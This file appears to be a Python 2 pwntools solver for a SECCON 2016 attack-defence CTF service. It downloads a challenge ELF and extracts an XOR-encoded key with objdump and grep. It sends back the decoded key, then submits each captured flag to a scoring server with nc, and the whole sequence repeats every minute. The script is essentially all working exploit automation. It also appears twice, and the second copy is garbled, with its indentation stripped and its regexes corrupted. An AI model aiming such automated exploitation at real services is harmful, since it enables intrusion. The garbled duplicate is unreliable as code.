icchy/solve_10000.py

## solve_10000.py
from pwn import *
import hashlib
import commands
import re


def submit(flag):
    import commands
    import random

    res = commands.getoutput("echo tuat_mcc {} | nc 10.0.1.1 {}".format(flag, 10000+random.randint(0, 3)))
    print res
    if "Incorrect" in res:
        return False
    if "Invalid user" in res:
        return False

    return True

def prob_9999(bindata):
    return "seccon2016osaka"

def prob_10000(bindata):
    h = hashlib.md5(bindata).hexdigest()
    path = "./data/10000/bin_{}.elf".format(h)
    res = commands.getoutput('objdump -d {} | grep movabs | grep rsi'.format(path))
    addr = int(res.split(':')[0], 16)
    key_addr = int(re.match(r'.*\$(.*),.*', res).groups()[0], 16) - 0x400000

    res = commands.getoutput('objdump -d {} | grep {}'.format(path, hex(addr-0x9)[2:]))
    len_val = int(re.match(r'.*\$(.*),.*', res).groups()[0], 16)

    key = bindata[key_addr:key_addr+len_val]
    res = commands.getoutput('objdump -d {} | grep {}'.format(path, hex(addr+0x12)[2:]))
    xor_key = int(re.match(r'.*\$(.*),.*', res).groups()[0], 16)

    exploit = ""
    for c in key:
        exploit += chr(ord(c)^xor_key)

    return exploit


def main():
    host = "10.0.1.2"
    ports = [10000]

    for port in ports:
        conn = remote(host, port)
        conn.recvuntil('IMAGE:')
        bindata = conn.recvuntil('\n').decode('base64')
        open('data/{}/bin_{}.elf'.format(port, hashlib.md5(bindata).hexdigest()), 'wb').write(bindata)

        exploit = globals()['prob_{}'.format(port)](bindata)
        conn.send(exploit.encode('base64'))
        flag = conn.recvuntil('\n')
        if ':' in flag:
            flag = flag.split(':')[1].strip()
        else:
            continue

        submit(flag)
        conn.close()


if __name__ == '__main__':
    while True:
        main()
        time.sleep(60)
	from pwn import *
	import hashlib
	import commands
	import re


	def submit(flag):
	import commands
	import random

	res = commands.getoutput("echo tuat_mcc {} \| nc 10.0.1.1 {}".format(flag, 10000+random.randint(0, 3)))
	print res
	if "Incorrect" in res:
	return False
	if "Invalid user" in res:
	return False

	return True

	def prob_9999(bindata):
	return "seccon2016osaka"

	def prob_10000(bindata):
	h = hashlib.md5(bindata).hexdigest()
	path = "./data/10000/bin_{}.elf".format(h)
	res = commands.getoutput('objdump -d {} \| grep movabs \| grep rsi'.format(path))
	addr = int(res.split(':')[0], 16)
	key_addr = int(re.match(r'.\$(.),.*', res).groups()[0], 16) - 0x400000

	res = commands.getoutput('objdump -d {} \| grep {}'.format(path, hex(addr-0x9)[2:]))
	len_val = int(re.match(r'.\$(.),.*', res).groups()[0], 16)

	key = bindata[key_addr:key_addr+len_val]
	res = commands.getoutput('objdump -d {} \| grep {}'.format(path, hex(addr+0x12)[2:]))
	xor_key = int(re.match(r'.\$(.),.*', res).groups()[0], 16)

	exploit = ""
	for c in key:
	exploit += chr(ord(c)^xor_key)

	return exploit


	def main():
	host = "10.0.1.2"
	ports = [10000]

	for port in ports:
	conn = remote(host, port)
	conn.recvuntil('IMAGE:')
	bindata = conn.recvuntil('\n').decode('base64')
	open('data/{}/bin_{}.elf'.format(port, hashlib.md5(bindata).hexdigest()), 'wb').write(bindata)

	exploit = globals()['prob_{}'.format(port)](bindata)
	conn.send(exploit.encode('base64'))
	flag = conn.recvuntil('\n')
	if ':' in flag:
	flag = flag.split(':')[1].strip()
	else:
	continue

	submit(flag)
	conn.close()


	if __name__ == '__main__':
	while True:
	main()
	time.sleep(60)